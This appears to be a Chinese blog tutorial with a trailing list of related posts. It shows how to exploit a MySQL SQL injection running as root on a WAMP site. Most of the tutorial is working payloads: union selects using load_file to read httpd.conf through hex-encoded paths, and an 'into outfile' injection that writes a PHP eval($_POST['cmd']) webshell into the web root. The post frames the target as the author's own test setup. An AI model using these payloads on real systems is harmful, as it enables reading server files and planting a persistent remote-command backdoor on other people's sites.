标签:

首先我们的找到一个有注入的站:这里我用自己搭建的环境表示;大家不要乱来

http://localhost/pentest/sql/sql_injection_get.php?id=1

发现是root权限,我们尝试直接写马

首先要找到网站的主目录:

数据库目录:D:\wamp\bin\mysql\mysql5.5.20\data\

进行判断,服务器可能为wampserver简易版,httpd.conf文件在D:/wamp/bin/apache/Apache2.2.21/conf/httpd.conf

http://localhost/pentest/sql/sql_injection_get.php?id=1‘ and 1=2 union select 1,2,3 load_file(‘D:/wamp/bin/apache/Apache2.2.21/conf/httpd.conf‘) from user--+

如果这样不成功,建议将目录转换为hex编码进行:即 load_file(0x443A5C77616D705C62696E5C6170616368655C417061636865322E322E32315C636F6E665C68747470642E636F6E66)

找到了网站目录:D:/wamp/www

我们尝试写:

http://localhost/pentest/sql/sql_injection_get.php?id=1‘ and 1=2 union select 1,2,0x3C3F706870206576616C28245F504F53545B27636D64275D293B3F3E into outfile ‘D:/wamp/www/xx.php‘ from user --+

<?php eval($_POST[‘cmd‘]);?>的hex编码:0x3C3F706870206576616C28245F504F53545B27636D64275D293B3F3E

然后访问:http://localhost/xx.php

标签:

mysql root 权限注入_Mysql注入root权限直接写一句话马相关推荐

  1. 01_SQL注入_Mysql注入利用联合查询的手工注入

    01_SQL注入_Mysql注入:利用联合查询的手工注入 1.SQL注入的成因 [严正声明]仅供学习,勿做他用!!! [严正声明]仅供学习,勿做他用!!! [严正声明]仅供学习,勿做他用!!! 遵纪守 ...

  2. mysql恢复root权限设置密码_MySQL修改root密码及恢复权限的多种方法

    方法1: 用SET PASSWORD命令 mysql -u root mysql> SET PASSWORD FOR 'root'@'localhost' = PASSWORD('newpass ...

  3. mysql root 被锁_MySQL的root权限密码忘记的解决办法

    今天是我第一次用MySQL这个软件,我在自己的系统中安装了一个(OS X ),在虚拟机中的windows XP 环境下安装了一个,我希望能在我自己的系统下远程连接到XP 中的MySQL,于是XP环境下 ...

  4. mysql权限清理_mysql清理用户权限

    1.mysql数据库地址文件格式 db:test  10.10.10.10  10.10.10.11 db:profile  10.10.10.12:3306   10.10.10.13:3307 2 ...

  5. mysql用户及权限管理_MySQL 用户及权限管理

    1.mysql用户的定义 在mysql中,用户由用户名和主机域组成的. 1.1 用户名的写法 mysql> create user test1@'localhost'; 注意:用户名不要以数字. ...

  6. mysql 远程登陆设置_MYSQL远程登录权限设置

    Mysql默认关闭远程登录权限,如下操作允许用户在任意地点登录: 1. 进入mysql,GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY ...

  7. mysql权限问题_Mysql 数据库的权限问题

    之前一直对Mysql数据库的权限没太理解 root用户具有最高的权限,也就是超级用户,root用户可以看到数据库中的所有的内容,而其它用户只能对经过root用户授权过的数据库进行操作,如果想在其它用户 ...

  8. mysql-front权限管理_mysql 用户及权限管理 小结

    MySQL 默认有个root用户,但是这个用户权限太大,一般只在管理数据库时候才用.如果在项目中要连接 MySQL 数据库,则建议新建一个权限较小的用户来连接. 在 MySQL 命令行模式下输入如下命 ...

  9. mysql注入写一句话_Mysql注入root权限直接写一句话马

    首先我们的找到一个有注入的站:这里我用自己搭建的环境表示:大家不要乱来 http://localhost/pentest/sql/sql_injection_get.php?id=1 发现是root权 ...

最新文章

  1. 检查是否支持 SO_REUSEPORT
  2. TIOBE公布11月榜单:Python势不可挡,超越Java !
  3. 重庆邮电大学计算机学院院徽,Slide计算机学院-重庆邮电大学.PPT
  4. 7.0上的新KIE持久性API
  5. springBoot中自定义的yml文件引用的方式
  6. 前端学习(2973):配置嵌套路由
  7. JavaScript——执行环境、变量对象、作用域链
  8. 虚拟化技术简介--CPU/内存/IO/网络虚拟化介绍
  9. 算法-lowb三人组
  10. python(3)-内置函数2
  11. Hadoop大数据测试:Hadoop大数据平台测试流程
  12. 【认知无线网络】认知无线网络基础知识学习
  13. 使用arcgis、matlab与R语言GD包进行地理探测器 批量运行,并导出探测结果
  14. j3服务器维修教程,服务器维修基本技术手册.docx
  15. 华表(cell)的使用总结
  16. 手把手教学暴力破解WIFI密码(仅供学习交流)
  17. linux常见通配符的含义,linux通配符含义
  18. linux 内核 浮点运算,ARM64与x86_64浮点运算精度比较
  19. Redis五大数据类型常用命令与使用场景总结
  20. 硬件设计——关于电路设计的一些知识

热门文章

  1. 解决win下安装wordcloud出错问题
  2. 论文笔记:MTCNN
  3. sql server 2008 r2 没有维护计划_坚果R2发布,骁龙865+1亿像素+90Hz,4499元起
  4. boost ref, bind
  5. MyBatis的架构和其运行流程
  6. 523. Continuous Subarray Sum
  7. 《HTML 5与CSS 3权威指南(第3版·下册)》——19.4.2 E:enabled伪类选择器与E:disabled伪类选择器...
  8. 瞬发大量并发连接 造成MySQL连接不响应的分析
  9. git、github、gitlab、gitee都是什么?
  10. Django 3.1.5, CSRF verification failed. Request aborted.